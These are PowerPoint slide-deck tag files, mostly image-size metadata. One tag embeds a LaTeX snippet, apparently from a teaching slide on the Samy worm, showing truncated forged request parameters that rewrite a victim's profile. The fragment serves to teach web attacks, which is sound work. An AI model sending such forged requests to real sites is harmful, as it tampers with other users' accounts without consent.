<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.93752"/>
  <p:tag name="ORIGINALWIDTH" val="3.5"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;\&amp;name=Samy&#10;\&amp;description=Samy is my hero&#10;\&amp;accesslevel[descriptuion]=2&#10;\dots (many lines omitted) \dots&#10;\&amp;guid=47&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="20"/>
  <p:tag name="IGUANATEXCURSOR" val="203"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag39.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="0.9659269"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag390.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag391.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag392.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag393.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag394.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.75"/>
  <p:tag name="ORIGINALWIDTH" val="3.43752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag395.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.93752"/>
  <p:tag name="ORIGINALWIDTH" val="3.125"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag396.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag397.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag398.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.125"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag399.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.93752"/>
  <p:tag name="ORIGINALWIDTH" val="3.5"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.136364"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag400.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="3.625"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag401.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag402.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="2.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag403.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag404.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.43752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag405.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="2.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag406.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.125"/>
  <p:tag name="ORIGINALWIDTH" val="3.625"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag407.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.31252"/>
  <p:tag name="ORIGINALWIDTH" val="3.25"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag408.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="2.875"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag409.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.125"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag41.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.136364"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag410.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag411.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.68752"/>
  <p:tag name="ORIGINALWIDTH" val="3.375"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag412.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.93752"/>
  <p:tag name="ORIGINALWIDTH" val="3.18752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag413.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag414.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag415.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.125"/>
  <p:tag name="ORIGINALWIDTH" val="3.625"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag416.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="2.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag417.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="2.875"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag418.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag419.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.125"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag42.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag420.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag421.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag422.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.43752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag423.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag424.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.875"/>
  <p:tag name="ORIGINALWIDTH" val="3.5"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag425.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.5"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag426.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag427.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="2.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag428.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag429.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="2.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.431818"/>
  <p:tag name="ORIGINALWIDTH" val="3.238654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag430.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="2.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag431.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.75"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag432.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag433.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag434.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.125"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag435.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.75"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag436.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6"/>
  <p:tag name="ORIGINALWIDTH" val="2"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag437.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="3.625"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag438.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.125"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag439.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="2.875"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag44.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.431818"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag440.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag441.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.43752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

